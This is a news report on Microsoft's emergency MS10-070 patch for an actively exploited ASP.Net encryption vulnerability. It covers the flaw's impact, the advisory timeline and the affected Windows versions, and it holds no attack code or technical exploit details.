As promised, Microsoft today delivered an emergency patch for a Windows Web server flaw that is being actively exploited by hackers.
The fix addresses a vulnerability in ASP.Net's encryption that attackers could abuse to access Web applications with full administrator rights; decrypt session cookies or other encrypted data on a remote server; and access and snatch files from sites or Web applications.
ASP.Net is the Microsoft-designed Web application framework used to craft millions of sites and applications.
Microsoft first sounded the alert Sept. 17 after a pair of researchers demonstrated how attackers could pilfer browser session cookies, or steal passwords and usernames from Web sites.
Three days later, Microsoft warned users that it was seeing limited, active attacks, and urged Web server administrators to apply the workarounds spelled out in an updated advisory.
Today's MS10-070 update patches ASP.Net in all supported versions of Windows, ranging from Windows XP Service Pack 3 (SP3) and Windows Server 2003 to Windows 7 and Windows Server 2008 R2.
Microsoft pegged the single bug addressed Tuesday as "important," the second-highest ranking in its four-step system. "Based on our comprehensive monitoring of the threat landscape, we have determined an out-of-band release is needed to protect customers, as we have seen limited attacks and continued attempts to bypass current defenses and workarounds," the company said yesterday.